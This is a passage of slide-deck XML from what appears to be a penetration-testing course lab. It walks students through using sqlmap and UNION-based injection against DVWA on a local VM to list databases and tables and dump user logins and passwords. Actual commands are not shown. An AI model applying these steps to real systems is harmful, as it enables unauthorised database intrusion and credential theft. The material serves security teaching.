              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dumping the table data from vulnerable databases. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The process for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> involves:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Manually identifying a potential injection point.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pointing sqlmap at the potentially vulnerable URL. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If SQLMap confirms a vulnerability, proceed to dump database and table information. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In the next demo, we will:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scan a URL for injection vulnerabilities. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the database tables. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump user passwords.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0" name="Shape 1420"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1421" name="Google Shape;1421;p104"/>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 Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1422" name="Google Shape;1422;p10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23" name="Google Shape;1423;p104"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Dumping Databases with sqlmap</a:t>
            </a:r>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use sqlmap to dump information from a vulnerable database.</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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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7" name="Shape 1427"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428;p10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29" name="Google Shape;1429;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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90000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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3" name="Shape 1433"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1434" name="Google Shape;1434;p10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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1435" name="Google Shape;1435;p10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Using your Linux VM, turn on the DVWA with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>dvwa_start</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Google Shape;1436;p10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37" name="Google Shape;1437;p106"/>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600"/>
              <a:t>Browse the site and look for URL bars. Find the page that accepts a GET query parameter. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Record the URL: </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Use SQLMap to test the URL for a SQL injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16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1" name="Shape 1441"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p10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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1443" name="Google Shape;1443;p10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Using your Linux VM, turn on the DVWA with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>dvwa_start</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Google Shape;1444;p10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45" name="Google Shape;1445;p107"/>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600"/>
              <a:t>Browse the site and look for URL bars. Find the page that accepts a GET query parameter. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Record the URL: </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Use SQLMap to test the URL for a SQL injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16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9" name="Shape 1449"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450;p10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sqlmap Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p10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Using your Linux VM, turn on the DVWA with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>dvwa_start</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p10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53" name="Google Shape;1453;p108"/>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600"/>
              <a:t>Browse the site and look for URL bars. Find the page that accepts a GET query parameter. </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Record the URL: </a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Use SQLMap to test the URL for a SQL injection vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http://youripaddress/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="16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7" name="Shape 1457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="14185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Next, use a UNION-bases injection to perform the following tasks: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p10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60" name="Google Shape;1460;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730813"/>
            <a:ext cx="9144000" cy="1188600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Grab the database banner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List all available databases</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the tables of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dvwa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>List the columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dump the login and password columns of the users table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1461" name="Google Shape;1461;p109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1919425"/>
            <a:ext cx="9144000" cy="2925900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
